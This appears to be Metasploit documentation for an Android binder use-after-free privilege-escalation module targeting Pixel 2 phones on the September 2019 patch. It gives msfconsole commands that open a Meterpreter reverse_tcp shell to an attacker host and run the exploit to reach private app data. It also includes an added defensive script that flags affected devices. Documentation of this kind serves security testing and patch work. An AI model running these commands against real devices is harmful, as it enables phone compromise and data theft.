## Vulnerable Application
This exploit module currently targets a very specific build of Android on specific set of hardware targets:
- Google Pixel 2 or Pixel 2 XL phones running the September 2019 security patch level.
This exploit module would have to be retargeted for any other potentially vulnerable build or hardware target.
One difficult issue with the Google Pixel 2 is that, while many Google phones have an unlocked bootloader, making it easy to flash [older revisions of the device firmware](https://developers.google.com/android/images), the latest Pixel 2 updates appear to have disabled or broken this ability. This may be a firmware bug or intentional, but Google themselves do not appear to have [an answer for the problem](https://support.google.com/pixelphone/thread/14920605?hl=en). For testing, you may need a phone that was never updated to a later Android revision.
## Verification Steps
- Get an Android Meterpreter session on a Pixel 2 or Pixel 2 XL with the right kernel:
`msfconsole -qx "use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j"`
- Currently this only works on the Pixel 2 (and Pixel 2 XL) with the September 2019 security patch level. Validate that the kernel version looks like this:
```
uname -a
Linux localhost 4.4.177-g83bee1dc48e8 #1 SMP PREEMPT Mon Jul 22 20:12:03 UTC 2019 aarch64
```
- Run the exploit:
```
msf exploit(multi/handler) > use exploit/android/local/binder_uaf
msf exploit(android/local/binder_uaf) > set LHOST IPADDR
msf exploit(android/local/binder_uaf) > set LPORT 4448 (different from your Android meterpreter port)
LPORT => 4448
msf exploit(android/local/binder_uaf) > set SESSION -1
SESSION => -1
msf exploit(android/local/binder_uaf) > run
```
- **Verify** the new session can read and write private application data (in /data/data/..../)
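The kernel check in the verification steps above is also the check a defender wants when hunting for devices that still need the update. The script below is an added example, not part of the module documentation or of Metasploit: it matches a device's `uname -a` output against the kernel build string quoted above and compares the Android security patch level (the `YYYY-MM-DD` string that `getprop ro.build.version.security_patch` reports) against September 2019, so a fleet inventory can flag devices still on the targeted build. The function names, the cut-off date and the sample inputs are assumptions made for this example.

```shell
#!/bin/sh
# Added example (not from the module docs): flag devices still on the
# build this module targets, for patch-inventory purposes.
# Taken from the page: the kernel build string and the "September 2019"
# patch level. Assumed: the function names and the sample inputs below.

# Kernel build string the docs quote as the targeted build.
AFFECTED_KERNEL="4.4.177-g83bee1dc48e8"

# Last day of the targeted security patch level, as yyyymmdd (assumed cut-off).
LAST_AFFECTED_PATCH=20190930

# is_affected_kernel "<uname -a output>"
# Returns 0 when the output names the targeted kernel build, 1 otherwise.
is_affected_kernel() {
    case "$1" in
        *"$AFFECTED_KERNEL"*) return 0 ;;
        *) return 1 ;;
    esac
}

# patch_level_is_stale "YYYY-MM-DD"
# Returns 0 when the patch level is September 2019 or earlier,
# 1 when it is newer, 2 when the string is malformed.
patch_level_is_stale() {
    lvl=$(printf '%s' "$1" | tr -d '-')
    case "$lvl" in
        [0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9]) ;;
        *) return 2 ;;
    esac
    [ "$lvl" -le "$LAST_AFFECTED_PATCH" ]
}

# assess "<uname -a output>" "YYYY-MM-DD"
# Prints a verdict; returns 0 when both checks say the device is on the
# targeted build (update required), 1 otherwise.
assess() {
    if is_affected_kernel "$1" && patch_level_is_stale "$2"; then
        echo "AFFECTED: kernel $AFFECTED_KERNEL with patch level $2 (update required)"
        return 0
    fi
    echo "not the targeted build: kernel or patch level differs"
    return 1
}

# Constructed sample inputs; on a real device they would come from
# `adb shell uname -a` and `adb shell getprop ro.build.version.security_patch`.
SAMPLE_UNAME="Linux localhost 4.4.177-g83bee1dc48e8 #1 SMP PREEMPT Mon Jul 22 20:12:03 UTC 2019 aarch64"
SAMPLE_PATCH="2019-09-05"

assess "$SAMPLE_UNAME" "$SAMPLE_PATCH"
```

Run it against the two values collected from each device; a device that is on a newer kernel build or whose patch level is October 2019 or later is reported as not matching, and a malformed patch string is reported separately rather than treated as stale.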
## Scenarios
This module illustrates a privesc that, when chained with other exploit vectors, could turn an unprivileged sandboxed exploit into a sandbox escape and system compromise. Note that the target application may need to match the kernel CPU type, so for instance a 64-bit Chrome would need to be targeted with a 64-bit kernel.